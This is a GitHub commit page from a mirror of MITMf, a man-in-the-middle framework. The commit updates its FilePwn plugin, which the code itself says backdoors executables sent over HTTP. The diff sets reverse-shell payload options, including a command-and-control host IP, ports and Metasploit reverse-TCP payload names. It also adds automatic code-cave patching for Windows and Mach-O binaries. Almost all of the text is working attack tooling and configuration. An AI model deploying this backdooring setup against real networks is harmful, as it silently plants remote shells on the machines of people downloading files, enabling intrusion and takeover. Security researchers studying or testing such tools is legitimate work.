github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-07-16 10:03:52 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Updated FilePwn plugin with latest BDFProxy version

Browse source 
Removed exception handling in mitmf.py since I actually want a traceback
This commit is contained in:
byt3bl33d3r 2015-04-14 16:16:29 +02:00
parent 4dd497d8b9
commit 5e9158ce0a
5 changed files with 59 additions and 50 deletions
Download patch file Download diff file Expand all files Collapse all files

15
config/mitmf.conf
View file

@ -363,6 +363,7 @@
FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
CompressedFiles = True #True/False
[[[[LinuxIntelx86]]]]
SHELL = reverse_shell_tcp # This is the BDF syntax
HOST = 192.168.1.168 # The C2
@ -378,10 +379,12 @@
MSFPAYLOAD = linux/x64/shell_reverse_tcp
[[[[WindowsIntelx86]]]]
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
# PATCH_METHOD overwrites PATCH_TYPE with jump
PATCH_METHOD = automatic
HOST = 192.168.1.16
PORT = 4444
SHELL = reverse_tcp_stager
PORT = 8443
SHELL = iat_reverse_tcp_stager_threaded
SUPPLIED_SHELLCODE = None
ZERO_CERT = False
PATCH_DLL = True
@ -389,10 +392,12 @@
[[[[WindowsIntelx64]]]]
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
# PATCH_METHOD overwrites PATCH_TYPE with jump
PATCH_METHOD = automatic
HOST = 192.168.1.16
PORT = 8088
SHELL = reverse_shell_tcp
SUPPLIED_SHELLCODE = Nonepatchpatchpatch
SHELL = iat_reverse_tcp_stager_threaded
SUPPLIED_SHELLCODE = None
ZERO_CERT = True
PATCH_DLL = False
MSFPAYLOAD = windows/x64/shell_reverse_tcp

2
libs/bdfactory

@ -1 +1 @@
Subproject commit 9ce83ead5ddc4daa798b0f144b3cfeece6809c19
Subproject commit e6af51b0c921e7c3dd5bb10a0d7b3983f46ca32b

2
libs/responder

@ -1 +1 @@
Subproject commit e7a69e46c13f77c90300965a0897d13de6437f78
Subproject commit 137e8eea61ef3c3d0426312a72894d6a4ed32cef

30
mitmf.py
View file

@ -149,26 +149,22 @@ print "[*] MITMf v%s online... initializing plugins" % mitmf_version
load = []
for p in plugins:
try:
if vars(args)[p.optname] is True:
print "|_ %s v%s" % (p.name, p.version)
if hasattr(p, 'tree_output') and p.tree_output:
for line in p.tree_output:
print "| |_ %s" % line
p.tree_output.remove(line)
if vars(args)[p.optname] is True:
print "|_ %s v%s" % (p.name, p.version)
if hasattr(p, 'tree_output') and p.tree_output:
for line in p.tree_output:
print "| |_ %s" % line
p.tree_output.remove(line)
if getattr(args, p.optname):
p.initialize(args)
load.append(p)
if getattr(args, p.optname):
p.initialize(args)
load.append(p)
if vars(args)[p.optname] is True:
if hasattr(p, 'tree_output') and p.tree_output:
for line in p.tree_output:
print "| |_ %s" % line
except Exception:
print "[-] Error loading plugin %s: %s" % (p.name, PrintException())
if vars(args)[p.optname] is True:
if hasattr(p, 'tree_output') and p.tree_output:
for line in p.tree_output:
print "| |_ %s" % line
#Plugins are ready to go, start MITMf
if args.disproxy:

60
plugins/FilePwn.py
View file

@ -78,7 +78,7 @@ class FilePwn(Plugin):
optname = "filepwn"
desc = "Backdoor executables being sent over http using bdfactory"
implements = ["handleResponse"]
tree_output = ["BDFProxy v0.2 online"]
tree_output = ["BDFProxy v0.3.2 online"]
version = "0.2"
has_opts = False
@ -123,8 +123,6 @@ class FilePwn(Plugin):
self.zipblacklist = self.userConfig['ZIP']['blacklist']
self.tarblacklist = self.userConfig['TAR']['blacklist']
self.output.append("BDFProxy by midnite_runr online")
def convert_to_Bool(self, aString):
if aString.lower() == 'true':
return True
@ -167,6 +165,10 @@ class FilePwn(Plugin):
elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump':
cave_jumping = True
# if automatic override
if self.WindowsIntelx64['PATCH_METHOD'].lower() == 'automatic':
cave_jumping = True
targetFile = pebin.pebin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.WindowsIntelx64['SHELL'],
@ -178,6 +180,7 @@ class FilePwn(Plugin):
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']),
SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'],
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']),
PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower()
)
result = targetFile.run_this()
@ -193,6 +196,10 @@ class FilePwn(Plugin):
elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump':
cave_jumping = True
# if automatic override
if self.WindowsIntelx86['PATCH_METHOD'].lower() == 'automatic':
cave_jumping = True
targetFile = pebin.pebin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.WindowsIntelx86['SHELL'],
@ -203,7 +210,8 @@ class FilePwn(Plugin):
IMAGE_TYPE=self.WindowsType,
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']),
SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'],
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT'])
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT']),
PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower()
)
result = targetFile.run_this()
@ -236,7 +244,7 @@ class FilePwn(Plugin):
)
result = targetFile.run_this()
elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho
elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho
targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False)
targetFile.support_check()
@ -245,29 +253,29 @@ class FilePwn(Plugin):
if targetFile.FAT_FILE is True:
if self.FatPriority == 'x86':
targetFile = machobin.machobin(FILE=binaryFile,
OUTPUT = os.path.basename(binaryFile),
SHELL=self.MachoIntelx86['SHELL'],
HOST=self.MachoIntelx86['HOST'],
PORT=int(self.MachoIntelx86['PORT']),
SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
FAT_PRIORITY=self.FatPriority
)
OUTPUT=os.path.basename(binaryFile),
SHELL=self.MachoIntelx86['SHELL'],
HOST=self.MachoIntelx86['HOST'],
PORT=int(self.MachoIntelx86['PORT']),
SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
FAT_PRIORITY=self.FatPriority
)
result = targetFile.run_this()
elif self.FatPriority == 'x64':
targetFile = machobin.machobin(FILE=binaryFile,
OUTPUT = os.path.basename(binaryFile),
SHELL=self.MachoIntelx64['SHELL'],
HOST=self.MachoIntelx64['HOST'],
PORT=int(self.MachoIntelx64['PORT']),
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
FAT_PRIORITY=self.FatPriority
)
OUTPUT=os.path.basename(binaryFile),
SHELL=self.MachoIntelx64['SHELL'],
HOST=self.MachoIntelx64['HOST'],
PORT=int(self.MachoIntelx64['PORT']),
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
FAT_PRIORITY=self.FatPriority
)
result = targetFile.run_this()
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7':
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7':
targetFile = machobin.machobin(FILE=binaryFile,
OUTPUT = os.path.basename(binaryFile),
OUTPUT=os.path.basename(binaryFile),
SHELL=self.MachoIntelx86['SHELL'],
HOST=self.MachoIntelx86['HOST'],
PORT=int(self.MachoIntelx86['PORT']),
@ -276,9 +284,9 @@ class FilePwn(Plugin):
)
result = targetFile.run_this()
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007':
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007':
targetFile = machobin.machobin(FILE=binaryFile,
OUTPUT = os.path.basename(binaryFile),
OUTPUT=os.path.basename(binaryFile),
SHELL=self.MachoIntelx64['SHELL'],
HOST=self.MachoIntelx64['HOST'],
PORT=int(self.MachoIntelx64['PORT']),
@ -286,7 +294,7 @@ class FilePwn(Plugin):
FAT_PRIORITY=self.FatPriority
)
result = targetFile.run_this()
self.patched.put(result)
return
@ -464,7 +472,7 @@ class FilePwn(Plugin):
patchCount = 0
wasPatched = False
for info in zippyfile.infolist():
print "[*] >>> Next file in zipfile:", info.filename